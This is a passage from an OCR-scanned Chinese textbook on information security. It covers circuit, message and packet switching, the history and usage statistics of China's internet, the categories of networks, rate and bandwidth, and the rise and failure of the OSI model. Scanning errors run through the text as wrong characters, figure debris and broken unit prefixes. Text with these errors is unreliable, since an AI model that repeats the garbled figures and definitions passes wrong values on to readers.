机 后 ,挂机 信 令 告诉 这 些 交 换 机 ,使 交换 机 释放 刚才 使 用 的 这 条 物理 通路 ( 即 归 还 刚才 占 
用 的 所 有 通信 资源 ) 。 这 种 必须 经 过 ”建立 连接 (占用 通信 资源 ) 一 通话 (一 直 占 用 通信 资 
源 ) 一 释放 连接 (归还 通信 资源 )” 三 个 步 又 的 交换 方式 称 为 电路 交换 。 

图 2-7 为 电路 交换 的 示意 图 。 为 简单 起 见 ,图 中 没有 区 分 市 话 交换 机 和 长 途 电话 交 
换 机 。 应 当 注 意 的 是 ,用 户 线 是 电话 用 户 到 所 连接 的 市 话 交 换 机 的 连接 线路 ,是 用 户 专 用 


2-7 电路 交换 的 用 户 始 终 占 用 端 到 端的 通信 资源 
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的 线路 ,而 对 交换 机 之 间 拥 有 大 量 话 路 的 中 继 线 则 是 许多 用 户 共享 的 ,正在 通话 的 用 户 只 
占用 了 其 中 的 一 个 话 路 。 电 路 交换 的 一 个 重要 特点 就 是 在 通话 的 全 部 时 间 内 ,通话 的 两 
个 用 户 始 终 占用 端 到 端的 通信 资源 。 电 话机 A 和 B 之 间 的 通路 共 经 过 了 四 个 交换 机 ,而 
电话 机 C 和 D 是 属于 同一 个 交换 机 的 地 理 覆 盖 范 围 中 的 用 户 , 因 此 这 两 个 电话 机 之 间 建 
立 的 连接 就 不 需要 再 经 过 其 他 的 交换 机 。 

当 使 用 电路 交换 来 传送 计算 机 数据 时 ,其 线路 的 传输 效率 往往 很 低 。 这 是 因为 计算 
机 数据 是 突 发 式 地 出 现在 传输 线路 上 ,因此 线路 上 真正 用 来 传送 数据 的 时 间 往 往 不 到 
10% 其 至 1%。 实 际 上 ,已 被 用 户 占 用 的 通信 线路 在 绝 大 部 分 时 间 里 都 是 空 亲 的。 例如， 
当 用 户 阅 读 终 端 屏 幕 上 的 信息 或 用 键盘 输入 和 编辑 一 份 文件 时 ,或 计算 机 正在 进行 处 理 
而 结果 尚未 返回 时 ,宝贵 的 通信 线路 资源 并 未 被 利用 而 是 被 白白 浪费 了 。 

2) 分 组 交换 的 主要 特点 

分 组 交换 则 采用 存储 转发 技术 。 通 常 我 们 把 要 发 送 的 整 块 数据 称 为 一 个 报 文 
(message)。 在 发 送 报 文 之 前 , 先 把 较 长 的 报 文 划分 成 为 一 个 个 更 小 的 等 长 数据 段 , 例 
如 ,每 个 数据 段 为 1024 比特 位 。 在 每 一 个 数据 段 前 面 ,加 上 一 些 必要 的 控制 信息 组 成 的 
首部 后 ,就 构成 了 一 个 分 组 (packet) 。 分 组 又 称 为 “ 包 ”, 而 分 组 的 首部 也 可 称 为 "包头 ”。 
分 组 是 在 互联 网 中 传送 的 数据 单元 。 分 组 中 的 “首部 ”是 非常 重要 的 , 正 是 由 于 分 组 的 首 
部 包含 了 诸如 目的 地 址 和 源 地 址 等 重要 控制 信息 ,每 一 个 分 组 才能 在 互联 网 中 独立 地 选 
择 传输 路 径 。 

当 我 们 讨论 互联 网 的 核心 部 分 中 的 路 由 器 转发 分 组 的 过 程 时 ,往往 把 单个 的 网 络 简 
化 成 一 条 链 路 ,而 路 由 器 成 为 核心 部 分 的 结 点 ,如 图 2-8 所 示 。 这 种 简化 图 看 起 来 可 以 更 
加 突出 重点 ,因为 在 转发 分 组 时 最 重要 的 就 是 要 知道 路 由 器 之 间 是 怎样 连接 起 来 的 。 


二 = 网 络 核心 部 分 了 
a 口 \ Dn 


| 
sd 


图 2-8 核心 部 分 网 络 用 链 路 表示 的 分 组 交换 示意 图 


互联 网 的 核心 部 分 是 由 许多 网 络 和 把 它们 互 连 起 来 的 路 由 器 组 成 ,而 主机 处 在 互联 
网 的 边缘 部 分 。 在 互联 网 核心 部 分 的 路 由 器 之 间 一 般 都 用 高 速 链 路 相连 接 ,而 在 网 络 边 
缘 的 主机 接 人 到 核心 部 分 则 通常 以 相对 较 低 速率 的 链 路 相连 接 。 主 机 和 路 由 器 都 是 计算 
机 ,但 它们 的 作用 很 不 一 样 。 主 机 是 为 用 户 进行 信息 处 理 的 ,并 且 可 以 和 其 他 主机 通过 网 
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络 交换 信息 。 路 由 器 则 是 用 来 转发 分 组 的 , 即 进行 分 组 交换 的 。 路 由 器 收 到 一 个 分 组 , 先 
暂时 存储 下 来 ,再 检查 其 首部 ,查找 转发 表 , 按 照 首 部 中 的 目的 地 址 ,找到 合适 的 接口 转发 
出 去 ,把 分 组 交 给 下 一 个 路 由 器 。 这 样 一 步 一 步 地 (有 时 会 经 过 几 十 个 不 同 的 路 由 器 ) 以 
存储 转发 的 方式 ,把 分 组 交付 到 最 终 的 目的 主机 。 各 路 由 器 之 间 必 须 经 常 交换 彼此 掌握 
的 路 由 信息 ,以 便 创 建 和 维持 在 路 由 器 中 的 转发 表 , 使 得 转发 表 能 够 在 整个 网 络 拓扑 发 生 
变化 时 及 时 更 新 。 

现在 假定 图 中 的 主机 Hi 向 主机 Hs 发 送 数据 。 主 机 Hi 先 将 分 组 逐个 地 发 往 与 它 
直接 相连 的 路 由 器 A。 此 时 , 除 链 路 Hi 一 A 外 ,其 他 通信 链 路 并 不 被 目前 通信 的 双方 所 
占用 。 需 要 注意 的 是 ,即使 是 链 路 Hi 一 A, 也 只 是 当 分 组 正在 此 链 路 上 传送 时 才 被 占用 。 
在 各 分 组 传送 之 间 的 空闲 时 间 , 链 路 Hi 一 A 仍 可 为 其 他 主机 发 送 的 分 组 使 用 。 

路 由 器 A 把 主机 Hi 发 来 的 分 组 放 和 缓存。 假定 从 路 由 器 A 的 转发 表 中 查 出 应 把 
该 分 组 转发 到 链 路 A 一 C。 于 是 分 组 就 传送 到 路 由 器 C。 当 分 组 正在 链 路 A 一 C 传送 时 ， 
该 分 组 并 不 占用 网 络 其 他 部 分 的 资源 。 

路 由 器 C 继续 按 上 述 方式 查找 转发 表 , 假 定 查 出 应 转发 到 路 由 器 上 。 当 分 组 到 达 路 
由 器 玉 后 ,路 由 器 EE 就 最 后 把 分 组 直接 交 给 主机 Hs 。 

假定 在 某 一 个 分 组 的 传送 过 程 中 , 链 路 A 一 C 的 通信 量 太 大 ,那么 路 由 器 A 可 以 把 
分 组 沿 另 一 个 路 由 转发 到 路 由 器 B, 青 转发 到 路 由 器 EE, 最 后 把 分 组 送 到 主机 Hs 。 在 网 
络 中 可 同时 有 多 个 主机 进行 通信 ,如 主机 H; 也 可 以 经 过 路 由 器 B 和 与 主机 He 通信 。 

这 里 要 注意 ,路 由 器 暂时 存储 的 是 一 个 个 短 分 组 ,而 不 是 整个 的 长 报 文 。 短 分 组 是 暂 
存在 路 由 器 的 存储 器 ( 即 内 存 ) 中 而 不 是 存储 在 磁盘 中 。 这 就 保证 了 较 高 的 交换 速率 。 

在 图 2-8 中 只 画 了 一 对 主机 H 和 Hs 在 进行 通信 。 实 际 上 ,互联 网 可 以 容许 非常 多 
的 主机 同时 进行 通信 ,而 一 个 主机 中 的 多 个 进程 ( 即 正在 运行 中 的 多 道 程序 ) 也 可 以 各 自 
和 不 同 主机 中 的 不 同 进程 进行 通信 。 

应 当 注意 ,分 组 交换 在 传送 数据 之 前 不 必 先 占用 一 条 端 到 端的 通信 资源 。 分 组 在 哪 
段 链 路 上 传送 才 占用 这 段 链 路 的 通信 资源 。 分 组 到 达 一 个 路 由 器 后 , 先 暂时 存储 下 来 , 查 
找 转发 表 , 然 后 从 另 一 条 合适 的 链 路 转发 出 去 。 分 组 在 传输 时 就 这 样 一 段 段 地 断 续 占 用 
通信 资源 ,而 且 还 省 去 了 建立 连接 和 释放 连接 的 开销 ,因而 数据 的 传输 效率 更 高 。 

互联 网 采取 了 专门 的 措施 ,保证 了 数据 的 传送 具有 非常 高 的 可 靠 性 。 当 网 络 中 的 某 
些 结 点 或 链 路 突然 出 故障 时 ,在 各 路 由 器 中 运行 的 路 由 选择 协议 能 够 自动 找到 其 他 路 径 
转发 分 组 。 从 以 上 所 述 可 知 ,采用 存储 转发 的 分 组 交换 ,实质 上 是 采用 了 在 数据 通信 的 过 
程 中 断 续 (或 动态 ) 分 配 传输 带宽 的 策略 。 这 对 传送 突 发 式 的 计算 机 数据 非常 合适 ,使 得 
通信 线路 的 利用 率 大 大 提高 了 。 

为 了 提高 分 组 交换 网 的 可 靠 性 ,互联 网 的 核心 部 分 常 采用 网 状 拓扑 结构 ,使 得 当 发 生 
网 络 拥塞 或 少数 结 点 、 链 路 出 现 故 障 时 ,路 由 器 可 灵活 地 改变 转发 路 由 而 不 致 引起 通信 的 
中 断 或 全 网 的 瘫痪 。 此 外 ,通信 网 络 的 主干 线路 往往 由 一 些 高 速 链 路 构成 ,这 样 就 可 以 较 
高 的 数据 率 迅 速 地 传送 计算 机 数据 。 

分 组 交换 也 带 来 一 些 新 的 问题 。 例 如 ,分 组 在 各 路 由 器 存储 转发 时 需要 排队 ,这 就 会 
造成 一 定 的 时 延 。 因 此 ,必须 尽量 设法 减少 这 种 时 延 。 此 外 ,由 于 分 组 交换 不 像 电路 交换 
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那样 通过 建立 连接 来 保证 通信 时 所 需 的 各 种 资源 ,因而 无 法 确保 通信 时 端 到 端 所 需 的 
带宽 。 

分 组 交换 网 带 来 的 另 一 个 问题 是 各 分 组 必须 携带 的 控制 信息 也 造成 了 一 定 的 开销 。 
整个 分 组 交换 网 还 需要 专门 的 管理 和 控制 机 制 。 应 当 指出 ,从 本 质 上 讲 , 这 种 断 续 分 配 传 
输 带 宽 的 存储 转发 原理 并 非 是 完全 新 的 概念 。 自 古代 就 有 的 邮政 通信 ,就 其 本 质 来 说 也 
是 属于 存储 转发 方式 。 而 在 20 世纪 40 年 代 , 电 报 通信 也 采用 了 基于 存储 转发 原理 的 报 
文 交换 (message switching) 。 在 报 文 交换 中 心 ,一 份 份 电报 被 接收 下 来 ,并 穿 成 纸 带 。 操 
作 员 以 每 份 报 文 为 单位 , 撕 下 纸 带 ,根据 报 文 的 目的 站 地 址 , 拿 到 相应 的 发 报 机 转发 出 去 。 
这 种 报 文 交换 的 时 延 较 长 ,从 几 分 钟 到 几 小 时 不 等 。 现 在 报 文 交换 已 经 很 少 有 人 使 用 了 。 
分 组 交换 虽然 也 采用 存储 转发 原理 ,但 由 于 使 用 了 计算 机 进行 处 理 , 这 就 使 分 组 的 转发 非 
常 迅速 。 例 如 ARPANET 建 网 初期 的 经 验 表明 ,在 正常 的 网 络 负荷 下 ,当时 横 跨 美国 东 
西海 岸 的 端 到 端 平均 时 延 小 于 0. 1 秒 。 这 样 ,分 组 交换 虽然 采用 了 某 些 古老 的 交换 原理 ， 
但 实际 上 已 变 成 了 一 种 胃 新 的 交换 技术 。 

图 2-9 给 出 了 电路 交换 、 报 文 交换 和 分 组 交换 的 主要 区 别 。 图 中 的 A 和 D 分 别 是 源 
点 和 终点 ,而 B 和 C 是 在 A 和 之 间 的 中 间 结 点 。 图 中 的 最 下 方 归纳 了 三 种 交换 方式 
在 数据 传送 阶段 的 主要 特点 : 

(1) 电路 交换 ,整个 报 文 的 比特 流连 续 地 从 源 点 直达 终点 ,好 像 在 一 个 管道 中 传送 。 

(2) 报 文 交换 ,整个 报 文 先 传送 到 相 邻 结 点 ,全 部 存储 下 来 后 查找 转发 表 , 转 发 到 下 
一 个 结 点 。 

(3) 分 组 交换 ,单个 分 组 (这 只 是 整个 报 文 的 一 部 分 ) 传 送 到 相 邻 结 点 ,存储 下 来 后 查 
找 转 发 表 , 转 发 到 下 一 个 结 点 。 
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图 2-9 三 种 交换 的 比较 : 电路 交换 、 报 文 交换 、 分 组 交换 
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如 图 2-9 所 示 , 若 要 连续 传送 大 量 的 数据 , 且 其 传送 时 间 远 大 于 连接 建立 时 间 , 则 电 
路 交换 的 传输 速率 较 快 。 报 文 交换 和 分 组 交换 不 需要 预先 分 配 传输 带宽 ,在 传送 突 发 数 
据 时 可 提高 整个 网 络 的 信道 利用 率 。 由 于 一 个 分 组 的 长 度 往往 远 小 于 整个 报 文 的 长 度 ， 
因此 分 组 交换 比 报 文 交换 的 时 延 小 ,同时 也 具有 更 好 的 灵活 性 。 
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我 国 最 早 着 手 建设 专用 计算 机 广域网 的 是 铁道 部 。 铁 道 部 在 1980 年 即 开始 进行 计 
算 机 联网 实验 。1989 年 11 月 我 国 第 一 个 公用 分 组 交换 网 CNPAC 建成 运行 。 在 20 世 
纪 80 年 代 后 期 ,公安 .银行 .军队 以 及 其 他 一 些 部 门 也 相继 建立 了 各 自 的 专用 计算 机 广 域 
网 。 这 对 迅速 传递 重要 的 数据 信息 起 着 重要 的 作用 。 另 一 方面 ,从 20 世纪 80 年 代 起 , 国 
内 的 许多 单位 相继 安装 了 大 量 的 局 域 网 。 局 域 网 的 价格 便宜 ,其 所 有 权 和 使 用 权 都 属于 
本 单位 ,因此 便于 开发 .管理 和 维护 。 局 域 网 的 发 展 很 快 ,对 各 行 各 业 的 管理 现代 化 和 办 
公 自 动 化 已 起 了 积极 的 作用 。 

这 里 应 当 特 别提 到 的 是 1994 年 4 月 20 日 我 国 用 64kb/s 专线 正式 接 人 互联 网 。 从 
此 ,我 国 被 国际 上 正式 承认 为 接 入 互联 网 的 国家 。 同 年 5 月 中 国 科 学 院 高 能 物理 研究 所 
设立 了 我 国 的 第 一 个 万 维 网 服务 器 。 同 年 9 月 中 国 公用 计算 机 互联 网 CHINANET 正式 
启动 。 到 目前 为 止 ,我 国 陆续 建造 了 基于 互联 网 技术 的 并 可 以 和 互联 网 互 连 的 9 个 全 国 
范围 的 公用 计算 机 网 络 。 

另 一 个 重要 的 网 络 就 是 中 国教 育 和 科研 计算 机 网 (China Education and Research 
Network,CERNET) ,简称 为 中 国教 育 网 ,是 由 国家 投资 建设 ,教育 部 负责 管理 ,清华 大 学 
等 高 等 学 校 承担 建设 和 管理 运行 的 全 国 性 学 术 计 算 机 互联 网 络 。 全 国 已 经 有 一 千 多 所 高 
校 接 人 CERNET。CERNET 是 由 我 国 技术 人 员 独 立 自主 设计 、 建 设 和 管理 的 计算 机 互 
联网 络 , 也 是 中 国 开展 下 一 代 互联 网 研究 的 试验 网 络 。CERNET 在 全 国 第 一 个 实现 了 与 
国际 下 一 代 高 速 网 INTERNET 2 的 互联 。 

中 国 互联 网 络 信息 中 心 (Network Information Center of China,CNNIC) 每 年 公布 两 
次 我 国 互 联网 的 发 展 情况 。 读 者 可 在 其 网 站 www. cnnic. cn 上 查 到 最 新 的 和 过 去 的 历史 
文档 。CNNIC 把 过 去 半年 内 使 用 过 互联 网 的 6 周岁 及 以 上 的 中 国 居民 称 为 网 民 。 根 据 
CNNIC 发 表 的 《第 35 次 中 国 互 联网 络 发 展 状 况 统计 报告 》, 截 至 2014 年 12 月 底 , 我 国 网 
民 已 达到 6. 49 亿 , 互 联网 普及 率 已 达到 47.9%。 在 网 民 中 ,手机 网 民 的 规模 已 达到 5. 57 
亿 , 占 总 体 网 民 的 比例 为 85.8%。 中 国 网 民 中 农村 网 民 占 比 27. 5% ,规模 达 1.78 亿 。 通 
过 台式 电脑 和 笔记 本 电脑 接 入 互联 网 的 比例 分 别 为 70. 8% 和 43.2% ;手机 上 网 使 用 率 为 
85. 8% ;平板 电脑 上 网 使 用 率 达到 34. 8% ;电视 上 网 使 用 率 为 15.6%。 目 前 ,有 近 半 数 的 
网 民 在 使 用 微 信 、 微 博 , 网 络 视 频 用 户 明 显 增 多 ,网 民 最 主要 的 网 络 应 用 就 是 搜索 引擎 、 即 
时 通信 、 网 络 音乐 ` 网 络 新 闻 和 博客 等 。 此 外 ,更 多 的 经 济 活动 已 步 人 了 互联 网 时 代 , 网 上 
购物 、 网 上 支付 和 网 上 银行 的 使 用 率 也 迅速 提升 。 到 2011 年 底 , 我 国 的 国际 出 口 带宽 已 
超过 4Tb/s(C1Tb/s= 10*Gb/s), 其 中 ,中 国电 信 的 CHINANET 占 出 口 总 带宽 的 大 
约 62%。 


Ne/ 信息 安全 导论 


2.2 计算 机 网 络 的 类 别 


1. 计算 机 网 络 的 定义 

计算 机 网 络 的 精确 定义 并 未 统一 。 关 于 计算 机 网 络 的 最 简单 的 定义 是 : 一 些 互 相连 
接 的 自治 的 计算 机 的 集合 。 这 里 “自治 ?的 概念 即 独立 的 计算 机 , 它 有 自己 的 硬件 和 软 
件 ,可 以 单独 运行 使 用 ,而 “互相 连接 "是 指 计算 机 之 间 能 够 进行 数据 通信 或 交换 信息 。 最 
简单 的 计算 机 网 络 就 只 有 两 台 计算 机 和 连接 它们 的 一 条 链 路 , 即 两 个 结 点 和 一 条 链 路 , 因 
为 没有 第 三 台 计 算 机 ,因此 不 存在 交换 的 问题 。 

有 了 时 我 们 也 能 见 到 “计算 机 通信 和 网 ”这 一 名 词 ,其 含义 与 “计算 机 网 络 ” 相 同 。“ 计 算 机 
通信 ”与 “数据 通信 ”这 两 个 名 词 也 常 混用 。 前 者 强调 通信 的 主体 是 计算 机 中 运行 的 程序 
(在 传统 的 电话 通信 中 通信 的 主体 是 人 ) ,后 者 强调 通信 的 内 容 是 数据 (这 当然 是 在 进行 计 
算 机 通信 时 才能 传送 数据 ) 。 

2. 几 种 不 同类 别 的 网 络 

计算 机 网 络 有 多 种 类 别 , 下 面 进行 简单 的 介绍 。 

1) 按 网 络 的 作用 范围 进行 分 类 

(1) 广域网 (Wide Area Network,WAN)。 广 域 网 的 作用 范围 通常 为 几 十 到 几 千 公 
里 ,因而 有 时 也 称 为 远程 网 (long haul network)。 广 域 网 是 互联 网 的 核心 部 分 ,其 任务 是 
通过 长 距离 (例如 ,跨越 不 同 的 国家 ) 运 送 主机 所 发 送 的 数据 。 连 接 广域网 各 结 点 交换 机 
的 链 路 一 般 都 是 高 速 链 路 ,具有 较 大 的 通信 容量 。 

(2) 城 域 网 (Metropolitan Area Network,MAN) 。 城 域 网 的 作用 范围 一 般 是 一 个 城 
市 ,可 跨越 几 个 街区 甚至 整个 的 城市 ,其 作用 距离 约 为 5 一 50km。 城 域 网 可 以 为 一 个 或 
几 个 单位 所 拥有 ,但 也 可 以 是 一 种 公用 设施 ,用 来 将 多 个 局 域 网 进行 互 连 。 目 前 很 多 城 域 
网 采用 的 是 以 太 网 技术 ,因此 有 时 也 常 并 入 局 域 网 的 范围 。 

(3) 局 域 网 (Local Area Network,LAN)。 局 域 网 一 般 用 微型 计算 机 或 工作 站 通过 
高 速 通信 线路 相连 (速率 通常 在 10Mb/s 以 上 ). 但 地 理 上 则 局 限 在 较 小 的 范围 (如 1km 
左右 )。 在 局 域 网 发 展 的 初期 ,一 个 学 校 或 工厂 往往 只 拥有 一 个 局 域 网 ,但 现在 局 域 网 已 
非常 广泛 地 使 用 ,一 个 学 校 或 企业 大 都 拥有 许多 个 互 连 的 局 域 网 (这 样 的 网 络 常 称 为 校园 
网 或 企业 网 ) 。 

(4) 个 人 区 域 网 (Personal Area Network,PAN) 。 个 人 区 域 网 就 是 在 个 人 工作 地 方 
把 属于 个 人 使 用 的 电子 设备 (如 便携 式 电脑 等 ) 用 无 线 技 术 连 接 起 来 的 网 络 , 因 此 也 常 称 
为 无 线 个 人 区 域 网 (Wireless PAN,WPAN) ,其 范围 大 约 在 10m 左右 。 

顺便 指出 , 若 中 央 处 理 机 之 间 的 距离 非常 近 ( 如 仅 1m 的 数量 级 或 甚至 更 小 些 ) , 则 一 
般 就 称 之 为 多 处 理 机 系统 而 不 称 它 为 计算 机 网 络 。 

2) 按 网 络 的 使 用 者 进行 分 类 

(1) 公用 网 (public network) 。 这 是 指 电信 公 司 ( 国 有 或 私有 ) 出 资 建造 的 大 型 网 络 。 
“公用 ”的 意思 就 是 所 有 愿意 按 电信 公司 的 规定 交纳 费用 的 人 都 可 以 使 用 这 种 网 络 。 因 此 
公用 网 也 可 称 为 公众 网 。 
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(2) 专用 网 (private network)。 这 是 某 个 部 门 为 本 单位 的 特殊 业务 工作 的 需要 而 建 
造 的 网 络 。 这 种 网 络 不 向 本 单位 以 外 的 人 提供 服务 。 例 如 ,军队 、 铁 路 .电力 等 系统 均 有 
本 系统 的 专用 网 。 

公用 网 和 专用 网 都 可 以 传送 多 种 业务 。 如 传送 的 是 计算 机 数据 , 则 分 别 是 公用 计算 
机 网 络 和 专用 计算 机 网 络 。 

3) 用 来 把 用 户 接 人 到 互联 网 的 网 络 

用 来 把 用 户 接 入 到 互联 网 的 网 络 就 是 接 入 网 (Access Network, AN), 它 又 称 为 本 地 
接 入 网 或 居民 接 入 网 。 这 是 一 类 比较 特殊 的 计算 机 网 络 。 我 们 在 前 面 已 经 介绍 了 用 户 必 
须 通 过 ISP 才能 接 入 到 互联 网 。 由 于 从 用 户 家 中 接 入 到 互联 网 可 以 使 用 的 技术 有 许多 
种 ,因此 就 出 现 了 可 以 使 用 多 种 接 入 网 技术 连接 到 互联 网 的 情况 。 接 入 网 本 身 既 不 属于 
互联 网 的 核心 部 分 ,也 不 属于 互联 网 的 边缘 部 分 。 实 际 上 ,由 ISP 提供 的 接 入 网 只 是 起 到 
让 用 户 能 够 与 互联 网 连接 的 “桥梁 ”作用 。 在 互联 网 发 展 初期 ,用 户 多 用 电话 线 拨号 接 入 
互联 网 ,速率 很 低 (每 秒 几 千 比特 到 几 十 千 比 特 ), 因 此 那 时 并 没有 使 用 接 入 网 这 个 名 词 。 
直到 最 近 , 由 于 出 现 了 多 种 宽带 接 入 技术 ,宽带 接 入 网 才 成 为 互联 网 领域 中 的 一 个 热门 
课题 。 

3. 计算 机 网 络 的 性 能 

计算 机 网 络 的 性 能 一 般 是 指 它 的 几 个 重要 的 性 能 指标 。 但 除了 这 些 重要 的 性 能 指标 
外 ,还 有 一 些 非 性 能 特征 (nonperformance characteristics) 也 对 计算 机 网 络 的 性 能 有 很 大 
的 影响 。 性 能 指标 从 不 同 的 方面 来 度量 计算 机 网 络 的 性 能 。 下 面 介绍 常用 的 两 个 性 能 
指标 。 

(1) 速率 。 我 们 知道 ,计算 机 发 送出 的 信号 都 是 数字 形式 的 。 比 特 (bit) 是 计算 机 中 
数据 量 的 单位 ,也 是 信息 论 中 使 用 的 信息 量 的 单位 。 英 文字 bit 来 源 于 binary digit, 意 思 
是 一 个 “二 进 制 数字 ”, 因 此 一 个 比特 就 是 二 进 制 数字 中 的 一 个 1 或 0。 网 络 技术 中 的 速 
率 指 的 是 连接 在 计算 机 网 络 上 的 主机 在 数字 信道 上 传送 数据 的 速率 , 它 也 称 为 数据 率 
(data rate) 或 比特 率 (bit rate) 。 速 率 是 计算 机 网 络 中 最 重要 的 一 个 性 能 指标 。 速 率 的 单 
位 是 b/s( 比 特 每 秒 ) (或 bit/s, 有 时 也 写 为 bps, 即 bit per second) , 当 数 据 率 较 高 时 ,就 可 
以 用 kb/s(k=10: 一 千 ).Mb/s(M 王 10 一 兆 )\Gb/s(G 一 10? 一 吉 ) 或 Tb/s(T 一 102 一 
太 )。 现 在 人 们 常用 更 简单 的 并 且 是 很 不 严格 的 记 法 来 描述 网 络 的 速率 ,如 100M 以 太 
网 ,而 省 略 了 单位 中 的 b/s, 它 的 意思 是 速率 为 100Mb/s 的 以 太 网 。 顺 便 指出 ,上 面 所 说 
的 速率 往往 是 指 额 定 速率 或 标 称 速率 。 

(2) 带宽 。 在 计算 机 网 络 中 ,带宽 用 来 表示 网 络 的 通信 线路 所 能 传送 数据 的 能 力 , 因 
此 网 络 带宽 表示 在 单位 时 间 内 从 网 络 中 的 某 一 点 到 另 一 点 所 能 通过 的 “最 高 数据 率 "。 这 
里 提 到 “带宽 ”时 ,主要 是 指 这 个 意思 。 这 种 意义 的 带宽 的 单位 是 “比特 每 秒 ”, 记 为 b/s。 
在 这 种 单位 的 前 面 也 常常 加 上 千 (k) 、 兆 (MD) 、 吉 (G) 或 太 (T) 这 样 的 倍数 。 


2.3 计算 机 网 络 体系 结构 


在 计算 机 网 络 的 基本 概念 中 ,分 层次 的 体系 结构 是 最 基本 的 。 
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1. 计算 机 网 络 体系 结构 的 形成 

计算 机 网 络 是 个 非常 复杂 的 系统 。 为 了 说 明 这 一 点 ,可 以 设想 一 个 最 简单 的 情况 ， 
连接 在 网 络 上 的 两 台 计 算 机 要 互相 传送 文件 。 显 然 ,在 这 两 台 计算 机 之 间 必 须 有 一 条 传 
送 数 据 的 通路 。 但 这 还 远 远 不 够 。 至 少 还 有 以 下 几 件 工作 需要 去 完成 : 

(1) 发 起 通信 的 计算 机 必须 将 数据 通信 的 通路 进行 激活 。 所 谓 “ 激 活 ” 就 是 要 发 出 一 
些 信 令 ,保证 要 传送 的 计算 机 数据 能 在 这 条 通路 上 正确 发 送 和 接收 。 

(2) 要 告诉 网 络 如 何 识别 接收 数据 的 计算 机 。 

(3) 发 起 通信 的 计算 机 必须 查 明 对 方 计 算 机 是 否 已 开机 ,并 且 与 网 络 连接 正常 。 

(4) 发 起 通信 的 计算 机 中 的 应 用 程序 必须 弄 清 楚 ,对 方 计算 机 中 的 文件 管理 程序 是 
否 已 做 好 文件 接收 和 存储 文件 的 准备 工作 。 

(5) 若 计算 机 的 文件 格式 不 兼容 , 则 至 少 其 中 的 一 个 计算 机 应 完成 格式 转换 功能 。 

(6) 对 出 现 的 各 种 差错 和 意外 事故 ,如 数据 传送 错误 、 重 复 或 丢失 ,网 络 中 某 个 结 点 
交换 机 出 故障 等 ,应 当 有 可 靠 的 措施 保证 对 方 计算 机 最 终 能 够 收 到 正确 的 文件 。 

还 可 以 举 出 一 些 要 做 的 其 他 工作 。 巾 此 可 见 , 相 互通 信 的 两 个 计算 机 系统 必须 高 度 
协调 工作 才 行 ,而 这 种 “协调 "是 相当 复杂 的 。 为 了 设计 这 样 复杂 的 计算 机 网 络 , 早 在 最 初 
的 ARPANET 设计 时 即 提出 了 分 层 的 方法 。“ 分 层 " 可 将 庞大 而 复杂 的 问题 转化 为 若干 
较 小 的 局 部 问题 ,而 这 些 较 小 的 局 部 问题 就 比较 易于 研究 和 处 理 。1974 年 ,美国 的 IBM 
公司 宣布 了 系统 网 络 体系 结构 (System Network Architecture,SNA), 这 个 著名 的 网 络 标 
准 就 是 按照 分 层 的 方法 制定 的 。 现 在 用 IBM 大 型 机 构建 的 专用 网 络 仍 在 使 用 SNA。 不 
久 后 ,其 他 一 些 公司 也 相继 推出 自己 公司 的 具有 不 同名 称 的 体系 结构 。 

不 同 的 网 络 体系 结构 出 现 后 ,使 用 同一 个 公司 生产 的 各 种 设备 都 能 够 很 容易 地 互 连 
成 网 。 这 种 情况 显然 有 利于 一 个 公司 垄断 市 场 。 用 户 一 旦 购买 了 某 个 公司 的 网 络 , 当 需 
要 扩大 容量 时 ,就 只 能 再 购买 原 公 司 的 产品 。 如 果 购 买 了 其 他 公司 的 产品 ,那么 由 于 网 络 
体系 结构 的 不 同 ,就 很 难 互相 连通 。 然 而 ,全 球 经 济 的 发 展 使 得 不 同 网 络 体系 结构 的 用 户 
迫切 要 求 能 够 互相 交换 信息 。 为 了 使 不 同体 系 结构 的 计算 机 网 络 都 能 互 连 , 国 际 标准 化 
组 织 ISO 于 1977 年 成 立 了 专门 机 构 研 究 该 问题 。 不 久 就 提出 一 个 试图 使 各 种 计算 机 在 
世界 范围 内 互 连 成 网 的 标准 框架 , 即 著名 的 开放 系统 互 连 基 本 参考 模型 (Open Systems 
Interconnection Reference Model,.OSI/RM ,简称 OSITD) 。“ 开 放 ” 是 指 非 独 家 垄断 的 。 因 
此 只 要 遵循 OSI 标准 ,一 个 系统 就 可 以 和 世界 上 任何 地 方 、 也 遵循 这 同一 标准 的 其 他 任 
何 系统 进行 通信 。 这 一 点 很 像 世界 范围 的 电话 和 邮政 系统 ,这 两 个 系 绕 都 是 开放 系统 。 
“系统 ”是 指 在 现实 的 系统 中 与 互 连 有 关 的 各 部 分 (我 们 知道 ,并 不 是 一 个 系统 中 的 所 有 部 
分 都 与 互 连 有 关 。OSI/RM 参考 模型 是 把 与 互 连 无 关 的 部 分 除外 ,而 仅仅 考虑 与 互 连 有 
关 的 那些 部 分 ) 。 所 以 开放 系统 互 连 参考 模型 OSIVRM 是 个 抽象 的 概念 。 在 1983 年 形 
成 了 开放 系统 互 连 基 本 参考 模型 的 正式 文件 , 即 著 名 的 ISO 7498 国际 标准 ,也 就 是 所 谓 
的 七 层 协议 的 体系 结构 。 

OSI 试图 达到 一 种 理想 境界 , 即 全 世界 的 计算 机 网 络 都 遵循 这 个 统一 的 标准 ,因而 全 
世界 的 计算 机 将 能 够 很 方便 地 进行 互 连 和 交换 数据 。 在 20 世纪 80 年 代 , 许 多 大 公司 其 
至 一 些 国家 的 政府 机 构 纷 纷 表示 支持 OSI。 当 时 看 来 似乎 在 不 久 的 将 来 全 世界 一 定 会 按 
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照 OSI 制定 的 标准 来 构造 自己 的 计算 机 网 络 。 然 而 到 了 20 世纪 90 年 代 初 期 ,虽然 整套 
的 OSI 国际 标准 都 已 经 制定 出 来 了 ,但 由 于 互联 网 已 抢先 在 全 世界 覆盖 了 相当 大 的 范 
围 ,而 与 此 同时 却 几 乎 找 不 到 有 什么 厂家 生产 出 符合 OSI 标准 的 商用 产品 。 因 此 人 们 得 
出 这 样 的 结论 : OSI 只 获得 了 一 些 理论 研究 的 成 果 , 但 在 市 场 化 方面 OSI 则 事与愿违 地 
失败 了 。 现 今 规模 最 大 的 、 覆 盖 全 世界 的 互联 网 并 未 使 用 OSI 标准 。OSI 失败 的 原因 可 
归纳 为 : 

(1) OSI 的 专家 们 缺乏 实际 经 验 ,他 们 在 完成 OSI 标准 时 缺乏 商业 驱动 力 ; 

(2) OSI 的 协议 实现 起 来 过 分 复杂 ,而 且 运 行 效率 很 低 ; 

(3) OSI 标准 的 制定 周期 太 长 ,因而 使 得 按 OSI 标准 生产 的 设备 无 法 及 时 进入 市 场 ; 

(4) OSI 的 层次 划分 不 太 合理 ,有 些 功能 在 多 个 层次 中 重复 出 现 。 

